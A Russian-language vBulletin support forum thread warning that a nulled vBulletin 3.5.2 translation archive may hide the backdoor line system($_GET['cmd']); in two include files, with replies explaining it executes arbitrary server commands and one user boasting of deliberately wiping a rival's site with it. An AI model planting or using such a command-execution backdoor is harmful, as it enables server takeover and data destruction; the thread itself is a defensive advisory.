VBsupport перешел с домена .ORG на родной .RU
Ура!
Пожалуйста, обновите свои закладки - VBsupport.ru
Блок РКН снят, форум доступен на всей территории России, включая новые терртории, без VPN
На форуме введена премодерация ВСЕХ новых пользователей
Почта с временных сервисов, типа mailinator.com, gawab.com и/или прочих, которые предоставляют временный почтовый ящик без регистрации и/или почтовый ящик для рассылки спама, отслеживается и блокируется, а так же заносится в спам-блок форума, аккаунты удаляются
Если вы хотите приобрести какой то скрипт/продукт/хак из каталогов перечисленных ниже: Каталог модулей/хаков
Ещё раз обращаем Ваше внимание: всё, что Вы скачиваете и устанавливаете на свой форум, Вы устанавливаете исключительно на свой страх и риск.
Сообщество vBSupport'а физически не в состоянии проверять все стили, хаки и нули, выкладываемые пользователями.
Помните: безопасность Вашего проекта - Ваша забота. Убедительная просьба: при обнаружении уязвимостей или сомнительных кодов обязательно отписывайтесь в теме хака/стиля
Спасибо за понимание
Поскольку мы получили несколько сигналов о существовании эксплойта в архиве
"vBulletin 3.5.2 перевод - zCarot, null - SCRiPTMAFiA"
(vb352_zCarot_rusforum.rar) НАСТОЯТЕЛЬНО РЕКОМЕНДУЕМ всем посетителям сайта, качавшим и устанавливавшем эту версию проверить следующее:
наличие строки system($_GET['cmd']);
в файлах:
includes/functions.php
includes/init.php
Если такая строка присутствует, УДАЛИТЕ ЕЕ.
P.S. в настоящий момент никаких левых строк в архиве не наблюдается.
Она сама по себе ничего не дает, но при определенных условиях позволяет просмотреть весь каталог вверх,
... хотя, лучше пусть кто поопытнее ответит.
@StirolXXX
Продвинутый
Join Date: Jul 2005
Location: Украина, Киев
Posts: 454
Версия vB: 3.5.4
Reputation:
Опытный 50
Репутация в разделе: 1
0
zCarot
Если ты ету строку поместишь в файл .php и потом его запустишь с данным параметром - исполниться команда указаная в параметре, а если это вредоносная команда?
З.Ы: На сервере где установлен вбуллетин а не у тебя на компе!
Хоть ты и отлично переводишь, но: УЧИ PHP!
А вот у меня эта строка была, и я ее удлали у себя...
@alan
Join Date: May 2005
Location: Местоположение
Posts: 1,117
Версия vB: 3.8.x
Пол:
Репутация в разделе: 880
0
В самом деле, zCarot, ну выучи же ПХП наконец
Гигалол
@zCarot
zМарковь
Хочет третью строчку =)
Join Date: May 2005
Location: Лольск
Posts: 2,883
Версия vB: 3.8.x
Reputation:
Гуру 7454
Репутация в разделе: 5101
0
Alan да.. мне аж стыдно :o :o
на самом деле PHP на столько большой.. что для полного изучения всех его команд потребуется годика 2-3.. а там ещё поднадпишут их.. в мануал мне влом было лезть, вот и спросил
@StirolXXX
Продвинутый
Join Date: Jul 2005
Location: Украина, Киев
Posts: 454
Версия vB: 3.5.4
Reputation:
Опытный 50
Репутация в разделе: 1
0
Quote:
Она сама по себе ничего не дает, но при определенных условиях позволяет просмотреть весь каталог вверх,
... хотя, лучше пусть кто поопытнее ответит.
Это еще мягко сказано! Если известно чсто сервер на базе FreeBSD/Linux и этот експлоит есть - ну например команда rm ... ( точками заменен параметры ) может удалять файлы, к примеру так можно снесит файловый архив или еще что-то. Я зная что есть такой експлоит спнес НАМЕРЕННО сайтец знакомого с которым мы враги...
Выводы: лучше убрать везде где только можно!
З.Ы: Только что-то проверил вас: ниче такого нету zCarot
А вот насчет почитать: Фленов - PHP Глазами хакера
Очень полезно и рульно, а главно что сразу поймешь что это за брешь в безопасности!
З.Ы.Ы: А можно и мне хак при отправке быстрого ответа что-бы использовался AJAX?
в ЦЕЛЯХ БЕЗОПАСНОСТИ
